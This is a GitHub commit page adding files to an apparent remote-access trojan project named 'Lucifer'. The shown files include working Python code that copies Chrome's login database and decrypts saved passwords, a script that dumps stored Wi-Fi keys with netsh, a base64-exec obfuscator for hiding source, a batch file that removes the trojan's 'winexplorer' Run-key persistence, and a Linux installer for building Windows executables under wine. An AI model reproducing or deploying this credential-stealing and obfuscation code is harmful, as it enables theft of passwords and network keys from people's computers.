commit

Malwareman007 · Jun 22, 2022 · cae34c7 · cae34c7
1 parent 8f8949e
commit cae34c7
Show file tree

Hide file tree

Showing 11 changed files with 1,033 additions and 0 deletions.
diff --git a/Lucifer.py b/Lucifer.py
diff --git a/RemoveTHorse.bat b/RemoveTHorse.bat
@@ -0,0 +1,6 @@
+del /q C:\Users\"%USERNAME%"\AppData\Roaming\explorer.exe
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v winexplorer  /f
+cls
+echo "[*] DONE "
+echo "[*] Please Restart Your System!"
+pause
diff --git a/banners.py b/banners.py
@@ -0,0 +1,59 @@
+import random
+
+figlet_ansi_shadow = """
+ _     _     ____  _  _____ _____ ____ 
+/ \   / \ /\/   _\/ \/    //  __//  __\
+| |   | | |||  /  | ||  __\|  \  |  \/|
+| |_/\| \_/||  \_ | || |   |  /_ |    /
+\____/\____/\____/\_/\_/   \____\\_/\_\
+                                                                                                                                                                             
+"""
+
+figlet_big = """
+                    ___           ___                       ___           ___           ___     
+                   /\  \         /\__\                     /\__\         /\__\         /\  \    
+                   \:\  \       /:/  /        ___         /:/ _/_       /:/ _/_       /::\  \   
+                    \:\  \     /:/  /        /\__\       /:/ /\__\     /:/ /\__\     /:/\:\__\  
+  ___     ___   ___  \:\  \   /:/  /  ___   /:/__/      /:/ /:/  /    /:/ /:/ _/_   /:/ /:/  /  
+ /\  \   /\__\ /\  \  \:\__\ /:/__/  /\__\ /::\  \     /:/_/:/  /    /:/_/:/ /\__\ /:/_/:/__/___
+ \:\  \ /:/  / \:\  \ /:/  / \:\  \ /:/  / \/\:\  \__  \:\/:/  /     \:\/:/ /:/  / \:\/:::::/  /
+  \:\  /:/  /   \:\  /:/  /   \:\  /:/  /   ~~\:\/\__\  \::/__/       \::/_/:/  /   \::/~~/~~~~ 
+   \:\/:/  /     \:\/:/  /     \:\/:/  /       \::/  /   \:\  \        \:\/:/  /     \:\~~\     
+    \::/  /       \::/  /       \::/  /        /:/  /     \:\__\        \::/  /       \:\__\    
+     \/__/         \/__/         \/__/         \/__/       \/__/         \/__/         \/__/     
+                                                                                 
+"""
+
+figlet_bloody = """
+                                   
+ ###              #   ##           
+  #                  # #           
+ ##   ## ##  ### ## ###   ### #### 
+ #    ## ## ## # ##  #   #  #  ##  
+ #  # #  #  #    #   #   #### ##   
+##### ##### ###  ## ##   ###  #    
+                    #              
+                    #                     
+"""
+
+figlet_doom = """
+ _                   _   __             
+| |                 (_) / _|            
+| |     _   _   ___  _ | |_   ___  _ __ 
+| |    | | | | / __|| ||  _| / _ \| '__|
+| |____| |_| || (__ | || |  |  __/| |   
+\_____/ \__,_| \___||_||_|   \___||_|   
+
+"""
+
+figlet_drpepper = """
+ _              _  ___           
+| |   _ _  ___ <_>| | ' ___  _ _ 
+| |_ | | |/ | '| || |- / ._>| '_>
+|___|`___|\_|_.|_||_|  \___.|_|                                     
+
+"""
+
+
+def get_banner():
+    return random.choice([figlet_ansi_shadow, figlet_big, figlet_doom, figlet_drpepper])
diff --git a/encrypt_code.py b/encrypt_code.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python
+import base64
+
+class Encrypt:
+    def __init__(self):
+        self.YELLOW, self.GREEN = '\33[93m',  '\033[1;32m'
+        self.text = ""
+        self.enc_txt = ""
+
+    def encrypt(self, filename):
+        print(f"\n{self.YELLOW}[*] Encrypting Source Codes...")
+        with open(filename, "r") as f:
+            lines_list = f.readlines()
+            for lines in lines_list:
+                self.text += lines
+
+            self.text = self.text.encode()
+            self.enc_txt =  base64.b64encode(self.text)   
+
+        with open(filename, "w") as f:
+            f.write(f"import base64; exec(base64.b64decode({self.enc_txt}))")
+
+        print(f"{self.GREEN}[+] Operation Completed Successfully!\n")
+
+if __name__ == '__main__':   
+    test = Encrypt()
+    filename = input("Please Enter Filename: ")
+    test.encrypt(filename)
diff --git a/get_chrome_pass.py b/get_chrome_pass.py
@@ -0,0 +1,135 @@
+import os
+import sys
+import shutil
+import sqlite3
+import json, base64
+
+from cryptography.hazmat.backends import default_backend
+from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
+
+class GetChromePass:
+    def __init__(self):
+        self.passwordlog = ""
+        self.APP_DATA_PATH   = os.environ['LOCALAPPDATA']
+        self.DB_PATH         = r'Google\Chrome\User Data\Default\Login Data'
+        self.NONCE_BYTE_SIZE = 12
+
+    def start(self):
+        _full_path = os.path.join(self.APP_DATA_PATH, self.DB_PATH)
+        _temp_path = os.path.join(self.APP_DATA_PATH, 'sqlite_file')
+        if os.path.exists(_temp_path):
+            os.remove(_temp_path)
+        shutil.copyfile(_full_path,_temp_path)
+        self.show_password(_temp_path)
+        return self.passwordlog
+
+    def show_password(self, db_file):
+        conn = sqlite3.connect(db_file)
+        _sql = 'select signon_realm,username_value,password_value from logins'
+        for row in conn.execute(_sql):
+            host = row[0]
+            if host.startswith('android'):
+                continue
+            name = row[1]
+            value = self.chrome_decrypt(row[2])
+            _info = 'Hostname: %s\nUsername: %s\nPassword: %s\n\n' %(host,name,value)
+            self.passwordlog += _info
+        conn.close()
+        os.remove(db_file)
+
+    def chrome_decrypt(self, encrypted_txt):
+        if sys.platform == 'win32':
+            try:
+                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
+                    decrypted_txt = self.dpapi_decrypt(encrypted_txt)
+                    return decrypted_txt.decode()
+                elif encrypted_txt[:3] == b'v10':
+                    decrypted_txt = self.aes_decrypt(encrypted_txt)
+                    return decrypted_txt[:-16].decode()
+            except WindowsError:
+                return None
+        else:
+            try:
+                return self.unix_decrypt(encrypted_txt)
+            except NotImplementedError:
+                return None
+
+    def encrypt(self, cipher, plaintext, nonce):
+        cipher.mode = modes.GCM(nonce)
+        encryptor = cipher.encryptor()
+        ciphertext = encryptor.update(plaintext)
+        return (cipher, ciphertext, nonce)
+
+    def decrypt(self, cipher, ciphertext, nonce):
+        cipher.mode = modes.GCM(nonce)
+        decryptor = cipher.decryptor()
+        return decryptor.update(ciphertext)
+
+    def get_cipher(self, key):
+        cipher = Cipher(
+            algorithms.AES(key),
+            None,
+            backend=default_backend()
+        )
+        return cipher
+
+    def dpapi_decrypt(self, encrypted):
+        import ctypes
+        import ctypes.wintypes
+
+        class DATA_BLOB(ctypes.Structure):
+            _fields_ = [('cbData', ctypes.wintypes.DWORD),
+                        ('pbData', ctypes.POINTER(ctypes.c_char))]
+
+        p = ctypes.create_string_buffer(encrypted, len(encrypted))
+        blobin = DATA_BLOB(ctypes.sizeof(p), p)
+        blobout = DATA_BLOB()
+        retval = ctypes.windll.crypt32.CryptUnprotectData(
+            ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
+        if not retval:
+            raise ctypes.WinError()
+        result = ctypes.string_at(blobout.pbData, blobout.cbData)
+        ctypes.windll.kernel32.LocalFree(blobout.pbData)
+        return result
+
+    def unix_decrypt(self, encrypted):
+        if sys.platform.startswith('linux'):
+            password = 'peanuts'
+            iterations = 1
+        else:
+            raise NotImplementedError
+
+        from Crypto.Cipher import AES
+        from Crypto.Protocol.KDF import PBKDF2
+
+        salt      = 'saltysalt'
+        iv        = ' ' * 16
+        length    = 16
+        key       = PBKDF2(password, salt, length, iterations)
+        cipher    = AES.new(key, AES.MODE_CBC, IV=iv)
+        decrypted = cipher.decrypt(encrypted[3:])
+        return decrypted[:-ord(decrypted[-1])]
+
+    def get_key_from_local_state(self):
+        jsn = None
+        with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode ="r") as f:
+            jsn = json.loads(str(f.readline()))
+        return jsn["os_crypt"]["encrypted_key"]
+
+    def aes_decrypt(self, encrypted_txt):
+        encoded_key   = self.get_key_from_local_state()
+        encrypted_key = base64.b64decode(encoded_key.encode())
+        encrypted_key = encrypted_key[5:]
+        key           = self.dpapi_decrypt(encrypted_key)
+        nonce         = encrypted_txt[3:15]
+        cipher        = self.get_cipher(key)
+        return self.decrypt(cipher, encrypted_txt[15:], nonce)
+
+
+if __name__=="__main__":
+    Main = GetChromePass()
+    password = Main.start()
+    print(password)
+
+
+
diff --git a/get_wifi_pass.py b/get_wifi_pass.py
@@ -0,0 +1,39 @@
+import subprocess, re
+
+class GetWifiPassword:
+    def __init__(self):
+        self.command = "netsh wlan show profile"
+        self.result = ""
+
+    def start(self):
+        networks = subprocess.check_output(self.command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
+        networks = networks.decode(encoding="utf-8", errors="strict")
+        network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks) 
+
+        for network_name in network_names_list:
+            try:
+                command = "netsh wlan show profile " + network_name + " key=clear"
+                current_result = subprocess.check_output(command, shell=True, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL)
+                current_result = current_result.decode(encoding="utf-8", errors="strict")        
+
+                ssid = re.findall("(?:SSID name\s*:\s)(.*)", str(current_result))
+                authentication = re.findall(r"(?:Authentication\s*:\s)(.*)", current_result)
+                cipher = re.findall("(?:Cipher\s*:\s)(.*)", current_result)
+                security_key = re.findall(r"(?:Security key\s*:\s)(.*)", current_result)
+                password = re.findall("(?:Key Content\s*:\s)(.*)", current_result)
+
+                self.result += "\n\nSSID           : " + ssid[0] + "\n"
+                self.result += "Authentication : " + authentication[0] + "\n"
+                self.result += "Cipher         : " + cipher[0] + "\n"
+                self.result += "Security Key   : " + security_key[0] + "\n"
+                self.result += "Password       : " + password[0] 
+            except Exception:
+                pass
+
+        return self.result
+
+if __name__ == '__main__':
+    test = GetWifiPassword()
+    result = test.start()
+    print(result)
+
diff --git a/installer_linux.py b/installer_linux.py
@@ -0,0 +1,87 @@
+#!/usr/bin/python3
+
+import os, sys
+from datetime import datetime
+from datetime import date
+
+BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
+
+def isRoot():
+    if not os.geteuid() == 0:
+        sys.exit("{RED}[!] Installer must be run as root")
+
+def getCurrentTime():
+    now = datetime.now()
+    return now.strftime("%H:%M:%S")  
+
+def getCurrentDate():
+    return date.today().strftime("%Y-%m-%d")
+
+def printInfo(text):
+    print(f"[{BLUE}{getCurrentTime()}{WHITE}] [{GREEN}INFO{WHITE}] " + text)
+
+def printWarning(text):
+    print(f"[{BLUE}{getCurrentTime()}{WHITE}] [{YELLOW}WARNING{WHITE}] " + text)    
+
+def install_wine():
+    result = os.system("wine > /dev/null 2>&1")
+    if result != 0:
+        printWarning(f"wine is not installed. {GREEN}Installing...{WHITE}")
+        os.system("apt-get update && apt-get install wine")
+
+def install_wine32_pip_and_pyinstaller():
+    printInfo(f"installing wine32, python3-pip, pyinstaller ...")
+    os.system("dpkg --add-architecture i386 && apt-get update && apt-get install wine32 python3-pip pyinstaller && apt-get install python3-dev")
+
+def download_python():
+    printInfo(f"downloading Python v3.7 (32 Bit) ...")
+    os.system("wget https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe")
+
+def download_pywin32():
+    printInfo(f"downloading Pywin32 (32 Bit) ...")
+    os.system("wget https://github.com/mhammond/pywin32/releases/download/b227/pywin32-227.win32-py3.7.exe")    
+
+def install_python():
+    printInfo(f"installing Python3.7, you must continue its installation manually")
+    print("\n=====================================================================")
+    print(f"{YELLOW}[*] PLEASE NOTE : {WHITE}Choose Custom Install & Install Python to drive_c")
+    print("=====================================================================\n")
+    os.system("wine python-3.7.4.exe")
+
+def install_pywin32():
+    printInfo(f"installing Pywin32, you must continue its installation manually")
+    os.system("wine pywin32-227.win32-py3.7.exe")
+
+def install_python_dependencies():
+    printInfo(f"installing Python3.7 dependencies ...")
+    os.system("wine ~/.wine/drive_c/Python37-32/python.exe -m pip install pyinstaller mss==4.0.3 essential_generators==0.9.2 six==1.12.0 python-xlib==0.25 win32gui")
+
+def install_python_main_dependencies():
+    printInfo(f"installing main host Python3 dependencies ...")
+    os.system("pip3 install mss==4.0.3")
+    os.system("pip3 install essential_generators==0.9.2")
+    os.system("pip3 install six==1.12.0")
+    os.system("pip3 install python-xlib==0.25")
+
+    printInfo(f"{GREEN}[+] Done!")
+
+
+if __name__ == '__main__':
+    isRoot()
+
+    print(f"\n[*] starting installation @ {getCurrentTime()} /{getCurrentDate()}/\n")
+
+    if os.path.exists("~/.wine/drive_c/Python37-32/") == False:
+        install_wine()
+        install_wine32_pip_and_pyinstaller()
+        download_python()
+        download_pywin32
+        install_python()
+        install_pywin32()
+        install_python_dependencies()
+        install_python_main_dependencies()
+
+
+
+
+